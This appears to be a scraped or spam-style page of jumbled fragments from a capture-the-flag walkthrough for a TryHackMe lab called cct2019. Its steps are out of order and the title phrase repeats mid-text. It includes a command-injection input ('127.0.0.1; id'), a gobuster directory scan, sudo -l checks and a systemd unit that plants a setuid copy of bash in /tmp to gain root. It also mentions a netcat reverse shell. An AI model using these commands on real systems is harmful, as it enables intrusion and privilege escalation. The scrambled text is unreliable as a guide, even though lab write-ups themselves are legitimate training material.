Cct2019 Tryhackme =link= 【Extended — 2024】

[Install] WantedBy=multi-user.target

Read user.txt :

Check /var/www/html for config files – sometimes credentials are hardcoded. find / -name user.txt 2>/dev/null Likely in /home/mandy/user.txt . But you don’t have read access yet. Step 4 – Privilege Escalation 4.1 Check Sudo Rights sudo -l If you see: cct2019 tryhackme

[Unit] Description=Privilege escalation [Service] Type=simple User=mandy ExecStart=/bin/bash -c 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' [Install] WantedBy=multi-user

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt or cct2019 tryhackme

cat /home/mandy/user.txt Check sudo -l again as mandy – maybe mandy can run something as root.

127.0.0.1; id If you see output of id command, injection works. Use a netcat reverse shell one-liner.